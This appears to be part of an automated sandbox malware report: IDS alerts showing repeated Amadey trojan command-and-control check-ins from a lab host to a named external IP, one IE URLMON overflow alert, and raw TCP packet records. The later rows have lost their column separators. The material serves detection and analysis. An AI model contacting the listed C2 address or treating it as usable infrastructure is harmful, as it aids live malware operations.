04/28/21-22:59:10.858910 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49753 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:11.172408 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49754 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:11.480580 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49755 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:11.785012 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49756 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:12.109806 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49757 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:12.426002 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49758 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:12.749296 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49759 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:13.224732 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49760 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:13.536020 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49761 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:13.846182 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49762 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:14.534196 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49763 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:14.955260 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49764 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:15.731310 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49765 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:16.347454 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49766 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:16.671982 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49767 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:16.981094 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49768 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:17.284667 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49769 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:17.598478 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49770 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:17.921405 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49771 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:18.234110 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49772 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:18.544042 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49773 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:18.865421 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49774 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:19.192478 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49775 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:19.501440 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49776 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:19.817761 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49777 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:20.123038 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49778 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:20.421419 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49779 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:20.741419 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49780 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:21.066979 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49781 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:21.378845 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49783 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:21.502484 | TCP | 100000118 | COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt | 80 | 49782 | 176.111.174.114 | 192.168.2.4
04/28/21-22:59:21.704830 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49784 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:22.030292 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49785 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:22.342422 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49787 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:22.657373 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49789 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:22.965889 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49790 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:23.285708 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49791 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:23.594204 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49793 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:23.904932 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49794 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:24.222855 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49795 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:24.539024 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49796 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:24.846404 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49797 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:25.163521 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49798 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:25.493153 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49799 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:25.792899 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49800 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:26.093440 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49801 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:26.413189 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49802 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:26.724427 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49803 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:27.032350 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49804 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:27.347110 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49805 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:27.655445 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49806 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:27.967937 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49807 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:28.278501 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49808 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:28.580668 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49809 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:28.894852 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49810 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:29.208331 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49811 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:29.517535 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49812 | 80 | 192.168.2.4 | 176.111.174.114
                                                                                                                                          04/28/21-22:59:29.831133TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.141640TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.534422TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:30.861617TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.171793TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.490046TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:31.846140TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:32.434592TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:33.193332TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:33.744238TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.128179TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.440060TCP2027700ET TROJAN Amadey CnC Check-In4982680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:35.749244TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.063797TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.380536TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:36.694013TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.022661TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.331137TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.655920TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:37.989101TCP2027700ET TROJAN Amadey CnC Check-In4984180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.300671TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.610358TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:38.938213TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.269417TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.591569TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:39.906859TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.225920TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.533088TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:40.841883TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.144257TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.461703TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:41.784514TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.098555TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.403166TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:42.712897TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.036272TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.346451TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.661227TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:43.978337TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.282030TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.596576TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:44.905252TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.219613TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.539273TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:45.848770TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.161587TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.476013TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:46.795538TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.118421TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.437123TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:47.752852TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.067327TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.377612TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:48.693478TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.008996TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.342708TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.676523TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:49.993476TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:50.317758TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:50.723228TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:51.050752TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:51.847281TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:52.164590TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:53.538793TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:53.854027TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.178078TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.490307TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:54.800630TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.123074TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.440532TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:55.766357TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.080051TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.397057TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:56.727223TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.058214TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.366858TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:57.686993TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.000788TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.303217TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.614620TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:58.929699TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.240889TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.553277TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-22:59:59.861910TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.175297TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.487630TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:00.808924TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.133167TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.443860TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:01.755473TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.078834TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.406014TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:02.760524TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.071374TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.382013TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:03.692403TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.020567TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.329595TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.647457TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:04.958951TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.272541TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.582420TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:05.910500TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.225959TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.537076TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:06.853204TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.159349TCP2027700ET TROJAN Amadey CnC Check-In4996480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.475828TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:07.805189TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.115505TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.434033TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:08.735422TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.226793TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.552374TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:09.885467TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:10.585930TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:10.969853TCP2027700ET TROJAN Amadey CnC Check-In4997780192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:12.207300TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.4176.111.174.114
                                                                                                                                          04/28/21-23:00:12.526020TCP2027700ET TROJAN Amadey CnC Check-In4998080192.168.2.4176.111.174.114

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                          Apr 28, 2021 22:58:41.575043917 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.575174093 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.590642929 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.631258965 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.636953115 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.636974096 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.636985064 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.637056112 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.692831993 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.735693932 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.736040115 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.736119032 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.750406027 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.793097973 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.899204016 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.899254084 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.899303913 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.899316072 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.899343014 CEST44349733104.17.63.50192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:41.899348021 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.899364948 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:41.899403095 CEST49733443192.168.2.4104.17.63.50
                                                                                                                                          Apr 28, 2021 22:58:42.022394896 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.092135906 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.092298985 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.092727900 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.162348986 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.247497082 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.247606039 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.251470089 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323230028 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323343992 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323370934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323404074 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323438883 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323441029 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323472977 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323474884 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323508978 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323542118 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323544025 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323563099 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323577881 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323611021 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323621988 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323645115 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.323649883 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323689938 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.323728085 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.393313885 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393351078 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393377066 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393416882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393434048 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.393440008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393467903 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393471003 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:42.393493891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393520117 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:42.393527031 CEST4973580192.168.2.478.47.81.226
